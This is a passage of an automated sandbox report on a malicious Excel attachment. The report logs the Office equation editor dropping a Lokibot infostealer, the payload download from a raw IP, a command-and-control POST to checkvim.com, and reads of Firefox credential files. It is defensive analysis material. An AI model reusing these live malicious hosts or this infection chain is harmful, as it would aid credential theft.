              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: unknownTCP traffic detected without corresponding DNS query: 103.155.83.184
              Source: vbc.exeString found in binary or memory: http://checkvim.com/ga14/fre.php
              Source: vbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: vbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
              Source: 89D14D5A.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
              Source: vbc.exe, vbc.exe, 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: unknownHTTP traffic detected: POST /ga14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: checkvim.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 66369A18Content-Length: 176Connection: close
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89D14D5A.emfJump to behavior
              Source: unknownDNS traffic detected: queries for: checkvim.com
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00404ED4 recv,4_2_00404ED4
              Source: global trafficHTTP traffic detected: GET /wdc/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.83.184Connection: Keep-Alive

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040549C4_2_0040549C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004029D44_2_004029D4
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00222C244_2_00222C24
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002256EC4_2_002256EC
              Source: C:\Users\Public\vbc.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\Public\vbc.exeCode function: String function: 00405B6F appears 42 times
              Source: C:\Users\Public\vbc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
              Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,4_2_0040650A
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Original shipping documents.xlsxJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD190.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@4/15@142/2
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,4_2_0040434D
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: 5}NC:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr
              Source: Binary string: C:\yasacogirig_reyeg56\zajotowuyavi\yezufemeloya.pdb source: vbc.exe, 00000004.00000000.448184731.0000000000418000.00000002.00020000.sdmp, vbc.exe.2.dr

              Data Obfuscation:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.400000.1.unpack
              Detected unpacking (changes PE section rights)Show sources
              Source: C:\Users\Public\vbc.exeUnpacked PE file: 4.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.3e0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1268, type: MEMORYSTR
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402AC0 push eax; ret 4_2_00402AD4
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402AC0 push eax; ret 4_2_00402AFC
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00222D10 push eax; ret 4_2_00222D24
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00222D10 push eax; ret 4_2_00222D4C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0092E4B7 push edi; retf 4_2_0092E4B8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0092E911 push E83768D8h; retf 4_2_0092E916
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0092DABF push ebp; ret 4_2_0092DAC2
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0092AEFB push eax; ret 4_2_0092AF16
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0092B7BA push es; ret 4_2_0092B7BC
              Source: initial sampleStatic PE information: section name: .text entropy: 7.74250778335
              Source: initial sampleStatic PE information: section name: .text entropy: 7.74250778335
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)Jump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2032Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2028Thread sleep time: -420000s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,4_2_00403D74
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,4_2_00402B7C
              Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040317B mov eax, dword ptr fs:[00000030h]4_2_0040317B
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0022092B mov eax, dword ptr fs:[00000030h]4_2_0022092B
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00220D90 mov eax, dword ptr fs:[00000030h]4_2_00220D90
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002233CB mov eax, dword ptr fs:[00000030h]4_2_002233CB
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00928E7B push dword ptr fs:[00000030h]4_2_00928E7B
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
              Source: vbc.exe, 00000004.00000002.664494803.0000000000A00000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: vbc.exe, 00000004.00000002.664494803.0000000000A00000.00000002.00020000.sdmpBinary or memory string: !Progman
              Source: vbc.exe, 00000004.00000002.664494803.0000000000A00000.00000002.00020000.sdmpBinary or memory string: Program Manager<
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00406069 GetUserNameW,4_2_00406069

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
